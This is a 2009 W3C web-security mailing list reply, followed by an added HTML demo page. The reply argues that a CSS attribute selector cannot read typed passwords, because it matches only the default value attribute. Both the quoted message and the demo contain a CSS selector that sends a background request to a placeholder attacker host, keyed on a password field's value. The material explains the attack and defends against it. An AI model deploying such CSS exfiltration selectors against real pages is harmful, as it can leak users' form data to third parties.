- From: Daniel Glazman <daniel@glazman.org>
- Date: Mon, 07 Dec 2009 21:26:25 +0100
- To: public-web-security@w3.org
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.

Not at all. I repeat: not at all. You are confusing the value _HTML attribute_ and the value _DOM attribute_ here. The former represents the default value of the input element, and it's VERY unlikely a web author will ever want to give a default value to a password field; the latter represents the current value of the field, and it's NOT, I repeat NOT, copied to the HTML attribute.

So your selector above will never react to a character typed into a password field. It only reacts to the default value of the field...

</Daniel>

--
W3C CSS WG, Co-Chair
Received on Monday, 7 December 2009 20:26:57 UTC
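The following page is an added example, not part of the thread or of any W3C material, that makes the attribute/property distinction from the message observable. The selector and the background URL are the ones quoted in the message (the URL is only a placeholder; the browser will try to load it only if the selector ever matches). The element id `pw`, the `report` helper and the use of `pw.value = ...` to stand in for keystrokes are assumptions of this example. Opening it in a browser shows that neither `getAttribute("value")` nor `matches()` reacts when the field's content changes; only `setAttribute("value", ...)`, which is what a `value="..."` default in the markup amounts to, makes the selector match.

```html
<!DOCTYPE html>
<meta charset="utf-8">
<title>value attribute vs value property</title>
<style>
  /* The selector from the quoted message. It tests the HTML (content)
     attribute, not the current field content. The outline is only a visible
     marker so a match is obvious without looking at network requests. */
  input[type=password][value^=a] {
    background: url("//attacker/password_starts_with=a");
    outline: 3px solid red;
  }
</style>

<!-- No value attribute in the markup: the attribute starts out absent. -->
<label>Password: <input id="pw" type="password"></label>
<pre id="log"></pre>

<script>
  // Assumed helper for this example: prints attribute, property and selector
  // state after each step so the three can be compared side by side.
  const pw  = document.getElementById("pw");
  const log = document.getElementById("log");
  function report(step) {
    log.textContent +=
      step + "\n" +
      '  getAttribute("value") = ' + JSON.stringify(pw.getAttribute("value")) + "\n" +
      "  .value (DOM property) = " + JSON.stringify(pw.value) + "\n" +
      "  matches selector      = " + pw.matches("input[type=password][value^=a]") + "\n";
  }

  report("1. initial state");

  // Typing updates only the DOM property. Assigning .value from script has
  // the same effect on the attribute as keystrokes do: none.
  pw.value = "abc";
  report("2. after typing 'abc' (simulated with pw.value = 'abc')");

  // For comparison: the only thing the selector can see is the content
  // attribute, i.e. a default value such as <input value="abc">.
  pw.setAttribute("value", "abc");
  report("3. after setAttribute('value', 'abc')");

  // Further typing still leaves the attribute alone, so the selector keeps
  // matching on the stale default, not on what the user actually entered.
  pw.value = "zzz";
  report("4. after typing 'zzz' with the default still set");
</script>
```

Watching the page's network requests while stepping through it is the quickest way to confirm the same thing from the attacker's side: no request for the `password_starts_with=a` URL is made until step 3, and it is keyed to the default value, never to what was typed.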